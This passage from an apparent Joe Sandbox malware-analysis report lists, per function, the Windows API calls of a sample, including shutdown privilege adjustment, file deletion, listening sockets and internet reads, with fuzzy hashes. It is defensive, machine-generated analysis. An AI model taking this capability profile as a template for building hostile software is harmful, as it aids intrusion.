                                                              • Instruction Fuzzy Hash: 6641607190021AABCF14DF64CC45AEEBBB4FF04324F14457BE819A3291DB389A49CF58
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf
                                                              • String ID: 3cD$_D
                                                              • API String ID: 674341424-3978952248
                                                              • Opcode ID: 64e3949e1dbd2a75d46e1a1ee1c537a75353abb91a814583fb668a31556e0fe9
                                                              • Instruction ID: bdf3aa83ff47b9f9662bf26db534db95e67b2b8f9b204d68e5997f657127be1d
                                                              • Opcode Fuzzy Hash: 64e3949e1dbd2a75d46e1a1ee1c537a75353abb91a814583fb668a31556e0fe9
                                                              • Instruction Fuzzy Hash: 38229C716083009FD724DF14C881BAFB7E5AF88714F10891EF89A97291DB79ED05CB9A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: 5b04bcb8e48cf1603a958ea3b545425d60f39c7ca342db6d801b34357abdf38d
                                                              • Instruction ID: 0136ee98f4a995e8d0af7060850e90faefbab4dbcf511b793edbcfdfd68d274c
                                                              • Opcode Fuzzy Hash: 5b04bcb8e48cf1603a958ea3b545425d60f39c7ca342db6d801b34357abdf38d
                                                              • Instruction Fuzzy Hash: 8B12AC70A00609DFDF04EFA5D981AAEB3F5FF48304F10452AE846E7291EB39AD15CB59
                                                              APIs
                                                                • Part of subcall function 00434750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00434743,?,?,004337AE,?), ref: 00434770
                                                                • Part of subcall function 00494A31: GetFileAttributesW.KERNEL32(?,0049370B), ref: 00494A32
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00493B89
                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00493BD9
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00493BEA
                                                              • FindClose.KERNEL32(00000000), ref: 00493C01
                                                              • FindClose.KERNEL32(00000000), ref: 00493C0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 2649000838-1173974218
                                                              • Opcode ID: 72e85ba918383ba07dcb9e6a872228571ef0bec60a7213626963ac1f7f6fd37e
                                                              • Instruction ID: d8dc1e4f01d113869d3e96425cc8a40c080520d1729869760264a11d51463df0
                                                              • Opcode Fuzzy Hash: 72e85ba918383ba07dcb9e6a872228571ef0bec60a7213626963ac1f7f6fd37e
                                                              • Instruction Fuzzy Hash: 5F31A6710083849BC700EF64C8918AFBBE8AE96319F441E2EF4D593191EB29DA0DC75B
                                                              APIs
                                                                • Part of subcall function 004887E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0048882B
                                                                • Part of subcall function 004887E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00488858
                                                                • Part of subcall function 004887E1: GetLastError.KERNEL32 ref: 00488865
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 004951F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: 1389ac64059d9f966f38854e6b9750652b5e3e2ed8a67d4c3d24748c45942284
                                                              • Instruction ID: fb276f45c7437fb82601d653e092b5351883d3a9bf588808ccbaadafda7ad656
                                                              • Opcode Fuzzy Hash: 1389ac64059d9f966f38854e6b9750652b5e3e2ed8a67d4c3d24748c45942284
                                                              • Instruction Fuzzy Hash: 720147317916012BEF2D2378AC8AFBB7A589B05741F3009BBF807E21D2D9691C018B9D
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004A62DC
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A62EB
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 004A6307
                                                              • listen.WSOCK32(00000000,00000005), ref: 004A6316
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A6330
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 004A6344
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: 95fe9e0f279773fe742e64cdd0403bff4b4be84b68a13ff7377113734321398b
                                                              • Instruction ID: 22c7b883ae8742e6fd7b62595de6454f249df19f1eef59f3813cd826ac779985
                                                              • Opcode Fuzzy Hash: 95fe9e0f279773fe742e64cdd0403bff4b4be84b68a13ff7377113734321398b
                                                              • Instruction Fuzzy Hash: BC21D2316002009FCB10EF64CC89B6EB7A9EF59324F15426AEC1AA7391CB74AC05CB59
                                                              APIs
                                                                • Part of subcall function 00450DB6: std::exception::exception.LIBCMT ref: 00450DEC
                                                                • Part of subcall function 00450DB6: __CxxThrowException@8.LIBCMT ref: 00450E01
                                                              • _memmove.LIBCMT ref: 00480258
                                                              • _memmove.LIBCMT ref: 0048036D
                                                              • _memmove.LIBCMT ref: 00480414
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1300846289-0
                                                              • Opcode ID: 2140e960386192803087b156d50ba84f1ded330afec0d9d1411e82094013205c
                                                              • Instruction ID: 45f29d74af2ff3999dd4e101510ba26ab4fbd4f8a7b95cf934d5c4fb9e6f92b5
                                                              • Opcode Fuzzy Hash: 2140e960386192803087b156d50ba84f1ded330afec0d9d1411e82094013205c
                                                              • Instruction Fuzzy Hash: CC02F3B0A00209DBDF04DF65D9816AEBBB5EF44304F10846EE809DB352EB39DD14CB59
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 004319FA
                                                              • GetSysColor.USER32(0000000F), ref: 00431A4E
                                                              • SetBkColor.GDI32(?,00000000), ref: 00431A61
                                                                • Part of subcall function 00431290: DefDlgProcW.USER32(?,00000020,?), ref: 004312D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ColorProc$LongWindow
                                                              • String ID:
                                                              • API String ID: 3744519093-0
                                                              • Opcode ID: 7c99ac3797a09dc911c8438948c31ecba3c23df8c82202df9e6a60ed9cf56039
                                                              • Instruction ID: 4d3c14569f4ee6dd12b5db41083a41e3e1535c7f62f98e04615189e27c99275a
                                                              • Opcode Fuzzy Hash: 7c99ac3797a09dc911c8438948c31ecba3c23df8c82202df9e6a60ed9cf56039
                                                              • Instruction Fuzzy Hash: 0FA138B1106544BAE628BB294C84EBF359CDF49386F14121FF502D62B2DB2C9D42D2BF
                                                              APIs
                                                                • Part of subcall function 004A7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004A7DB6
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 004A679E
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A67C7
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 004A6800
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A680D
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 004A6821
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 99427753-0
                                                              • Opcode ID: 78218cc9bb8ddd1da377c9693c06cd9a1aed396ae00b4a52984ae60e86ac50eb
                                                              • Instruction ID: 3eea943c551ce81199ced32f1d7c18ef665f4fcd0d463b1c4c324d58abd19862
                                                              • Opcode Fuzzy Hash: 78218cc9bb8ddd1da377c9693c06cd9a1aed396ae00b4a52984ae60e86ac50eb
                                                              • Instruction Fuzzy Hash: EF41E9757002006FDB50BF259C86F3E77A8DF59718F04856EF919AB3C2CA789D008B99
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: 5da4ff96d34a32415e7824ed71b4978bf7a552f9bfd541a97d6a4b92574d6dab
                                                              • Instruction ID: 897116ba3bd85d51b5b1eeab5d136dbae17226b8cad7d179d996eb52ee87043f
                                                              • Opcode Fuzzy Hash: 5da4ff96d34a32415e7824ed71b4978bf7a552f9bfd541a97d6a4b92574d6dab
                                                              • Instruction Fuzzy Hash: 241193317005116BD7216F269C44B9FBBD8EF447A1B55543AEC49D3341CBB89C028ABC
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004880C0
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004880CA
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004880D9
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004880E0
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004880F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 1bdfed05c46f7c5d0e35ac6c0b728090418c1d69978cd3710dcda7b0c950d654
                                                              • Instruction ID: 79b10365de94e5e8e3486bf7d69b55f0d12b009a78aa809d51c1af920b8986cb
                                                              • Opcode Fuzzy Hash: 1bdfed05c46f7c5d0e35ac6c0b728090418c1d69978cd3710dcda7b0c950d654
                                                              • Instruction Fuzzy Hash: EBF0C270200215BFEB102FA9EC8CE6B3BACEF49754B40053AF909D2260CF609C05DB64
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0049C432
                                                              • CoCreateInstance.OLE32(004C2D6C,00000000,00000001,004C2BDC,?), ref: 0049C44A
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • CoUninitialize.OLE32 ref: 0049C6B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                              • String ID: .lnk
                                                              • API String ID: 2683427295-24824748
                                                              • Opcode ID: 45906759ee55bd5b4e56c6fa622e5a2e768e082983745796de67b80fccacf2f4
                                                              • Instruction ID: 818feba47952e1ccbcf2b1bf7275d2464afe948409f7fa354146054ea12b4a5f
                                                              • Opcode Fuzzy Hash: 45906759ee55bd5b4e56c6fa622e5a2e768e082983745796de67b80fccacf2f4
                                                              • Instruction Fuzzy Hash: 47A13CB1108205AFD700EF55C881EAFB7E8EF89358F00492EF15597192DBB5EE09CB56
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00434AD0), ref: 00434B45
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00434B57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: 3b4dccef4a982dd2c3de7519b0afb3be757c25e23bccc5c076cbefe684688332
                                                              • Instruction ID: 8a32a04e7db704ab49d8b0ec5992bddd280d08e45470e6f83909cc0daf9cda9d
                                                              • Opcode Fuzzy Hash: 3b4dccef4a982dd2c3de7519b0afb3be757c25e23bccc5c076cbefe684688332
                                                              • Instruction Fuzzy Hash: 36D0EC34A10712CFD7209B39DC28B86B6D4AF45351B21893A9499D6650D778F884C66C
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 004AEE3D
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 004AEE4B
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 004AEF0B
                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 004AEF1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                              • String ID:
                                                              • API String ID: 2576544623-0
                                                              • Opcode ID: b413e34651b1c8394fb5600a8659ee1695dc55d794d80c6120c6efd9d8dec532
                                                              • Instruction ID: 41ccc6553a74aaf92ba2f11ad0535ff8a201547e20b3b4fed157f39afa418838
                                                              • Opcode Fuzzy Hash: b413e34651b1c8394fb5600a8659ee1695dc55d794d80c6120c6efd9d8dec532
                                                              • Instruction Fuzzy Hash: A751A1B1504300AFD320EF25DC81E6BB7E8EF99714F10492EF595972A1EB74AD08CB96
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0048E628
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($|
                                                              • API String ID: 1659193697-1631851259
                                                              • Opcode ID: 31c32615d0123bb0c7e2c36f4f2ced55e8dd7f2f1ce382a6280a7d864f0b0d4a
                                                              • Instruction ID: 22b2dd8cf51e92b49bf98f3fba5adee8ae8b73a113321c8517d182a1b669106c
                                                              • Opcode Fuzzy Hash: 31c32615d0123bb0c7e2c36f4f2ced55e8dd7f2f1ce382a6280a7d864f0b0d4a
                                                              • Instruction Fuzzy Hash: 92323475A007059FDB28DF1AC48196AB7F0FF48320B15C86EE89ADB3A1E774E941CB44
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004A180A,00000000), ref: 004A23E1
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 004A2418
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: e9f574cbfea189d23631abea11875cf3f6ee2ea79886a4b653b599962debe16e
                                                              • Instruction ID: 0cdcbf05e7ce2c072d3d8187994bf3b1292e9d111cf5978293426fcf2b320c73
                                                              • Opcode Fuzzy Hash: e9f574cbfea189d23631abea11875cf3f6ee2ea79886a4b653b599962debe16e
                                                              • Instruction Fuzzy Hash: 4B413771504209BFEF10DEA9CE81EBB77BCEB52314F10406FFA00A6241DABC9E41A758
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0049B343
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0049B39D
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0049B3EA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: 27df176a4230bccca11de6534a895865efc3f2dc413fd48a8d7ab1721c083f91
                                                              • Instruction ID: cd2d5f1d38bdddb2ebe230febfbcea1e8a4d0b5683c1f016cc3888ad1ab12c32
                                                              • Opcode Fuzzy Hash: 27df176a4230bccca11de6534a895865efc3f2dc413fd48a8d7ab1721c083f91
                                                              • Instruction Fuzzy Hash: 18215E35A00108EFCB00EFA5D885AEDBBB8FF49314F1481AAE905AB351CB359D19CB55
                                                              APIs
                                                                • Part of subcall function 00450DB6: std::exception::exception.LIBCMT ref: 00450DEC
                                                                • Part of subcall function 00450DB6: __CxxThrowException@8.LIBCMT ref: 00450E01
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0048882B
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00488858
                                                              • GetLastError.KERNEL32 ref: 00488865
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1922334811-0
                                                              • Opcode ID: 5af37276d68c0fa827d4859e97e0489ef35df6e1c16e04dae535ae6f942b75b2
                                                              • Instruction ID: 44fd6b5978381c4223981471ae481d606672576ee99ce7c730e5d2371ed90c61
                                                              • Opcode Fuzzy Hash: 5af37276d68c0fa827d4859e97e0489ef35df6e1c16e04dae535ae6f942b75b2
                                                              • Instruction Fuzzy Hash: B911BFB2404205AFE718EFA4DC85D2BB7F8EB04311B60852EF85593212EB34BC048B64
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00488774
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0048878B
                                                              • FreeSid.ADVAPI32(?), ref: 0048879B
                                                              Memory Dump Source
